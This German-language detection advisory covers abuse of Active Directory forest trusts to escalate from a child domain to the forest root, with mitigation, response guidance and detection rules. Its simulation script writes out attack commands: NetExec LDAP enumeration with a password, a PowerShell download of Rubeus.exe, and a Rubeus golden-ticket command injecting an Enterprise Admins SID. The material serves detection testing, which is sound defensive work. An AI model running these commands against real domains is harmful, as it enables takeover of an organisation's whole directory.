Missbrauch von Active Directory-Forest-Vertrauensstellungen und Eskalierung von Child zu Root
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Diese technische Anleitung zeigt, wie ein Angreifer mit Domain-Admin-Rechten in einer untergeordneten Domäne administrative Kontrolle über die Forest Root erlangen kann. Der Angriff missbraucht bidirektionale Intra-Forest-Vertrauensstellungen und permissives SID-Filtering, um Enterprise-Admin-SIDs in gefälschte Kerberos-Tickets einzuschleusen. Es wird auch erklärt, wie Coercion-Methoden wie PetitPotam genutzt werden können, um Maschinenkonto-Tickets zu erfassen und DCSync-Angriffe zu ermöglichen.
Untersuchung
Der Bericht beschreibt ein laborbasiertes Engagement, bei dem der Angreifer in der pentest.ignite.local untergeordneten Domäne beginnt. Der Workflow umfasst das Auflisten von Wald-Vertrauensstellungen, das Extrahieren des krbtgt -Hashs, das Fälschen eines Goldenen Tickets mit SID-Historie und das Ausführen eines DCSync-Angriffs gegen die übergeordnete ignite.local Domäne. Ein sekundärer Eskalationspfad unter Verwendung der PetitPotam-Coercion-Technik wird ebenfalls demonstriert.
Abschwächung
Empfohlene Maßnahmen zur Abschwächung umfassen die Behandlung aller Domänencontroller als Tier-Null-Assets und das regelmäßige zweimalige Ändern des krbtgt Passworts im gesamten Wald. Organisationen sollten SID-Filtering bei Vertrauensstellungen durchsetzen, unbeschränkte Delegation deaktivieren und den Druckwarteschlangendienst auf Domänencontrollern ausschalten. Weitere Härtungsmaßnahmen umfassen die Verwendung der Gruppe Geschützte Benutzer für Kerberos-Schutz und die Überwachung auf ungewöhnliche DRSUAPI-Replikationsaktivitäten.
Antwort
Wenn DCSync-Aktivitäten oder die unbefugte Nutzung von Kerberos-Tickets erkannt werden, sollten die Reagierenden sofort betroffene Domänencontroller isolieren und mit einem doppelten krbtgt Passwort zurücksetzen beginnen. Alle Konten mit Enterprise-Admin-Rechten sollten untersucht werden, und die Umgebung sollte auf Tools wie Rubeus oder PetitPotam überprüft werden. Authentifizierungsprotokolle sollten ebenfalls auf ungewöhnliches Verhalten von Maschinenkonten und mögliche Coercion-bezogene Ereignisse überprüft werden.
Angriffsablauf
Erkennungen
Wahrscheinlicher Einsatz von Windows-Hacktools [Teil3] (via file_event)
Ansicht
Erkennung von Active Directory Forest Trust Missbrauch [Microsoft Windows Sicherheitsereignisprotokoll]
Ansicht
Active Directory Forest Trust Missbrauch: Eskalation von der Kind- zur Wurzel-Domäne [Windows Prozess-Erstellung]
Ansicht
Simulationsausführung
Voraussetzung: Der Telemetrie- und Basislinien-Preflight-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die zur Auslösung der Erkennungsregel ausgelegt ist. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die von der Erkennungslogik erwartete Telemetrie genau zu erzeugen. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle: Der Gegner hat einen Fuß in einer untergeordneten Domäne (
pentest.ignite.local) gefasst. Um zur Waldwurzel zu eskalieren, verwenden sie zunächstnxc(NetExec), um Domain-Controller über LDAP aufzulisten, um die Zielumgebung zu kartieren. Als nächstes verwenden siePowerShell, umRubeus.exevon einem externen, angreifergesteuerten Server herunterzuladen. Schließlich führen sieRubeus.exeaus, um ein Goldenes Ticket zu fälschen. Das gefälschte Ticket enthält die SID der Waldwurzel-Domäne (S-1-5-21-2964257136-1039789743-457275023), um es dem Gegner zu ermöglichen, einen Forest-Administrator zu imitieren, wenn er mit der Wurzeldomäne interagiert. -
Regressions-Testskript:
# Simulation des Forest Trust Missbrauchs zur Auslösung der spezifischen Sigma-Regel # 1. Simulation der NetExec LDAP-Abfrage # Hinweis: Wir rufen 'nxc' via Dummy-Ausführung auf, um das Kommandozeilen-Signatur zu imitieren Start-Process "cmd.exe" -ArgumentList "/c nxc ldap -u raaz -p Password@2 --dc-list" -NoNewWindow # 2. Simulation des Rubeus-Downloads via PowerShell # Dies passt exakt zum String: 'powershell wget http://Rubeus.exe -o Rubeus.exe' Start-Process "powershell.exe" -ArgumentList "wget http://Rubeus.exe -o Rubeus.exe" -NoNewWindow # 3. Simulation der Rubeus Golden Ticket Fälschung # Dies passt zum exakt erforderlichen String der Erkennungsregel $rubeusCmd = "Rubeus.exe golden /rc4: /user:administrator /domain:pentest.ignite.local /sid:S-1-5-21-3430543386-541733547-1396883976 /sids:S-1-5-21-2964257136-1039789743-457275023-519 /outfile:ticket" Start-Process "cmd.exe" -ArgumentList "/c $rubeusCmd" -NoNewWindow -
Bereinigungskommandos:
# Entfernen Sie die heruntergeladene Rubeus-Datei und alle Dummy-Artefakte Remove-Item -Path "Rubeus.exe" -ErrorAction SilentlyContinue Remove-Item -Path "ticket" -ErrorAction SilentlyContinue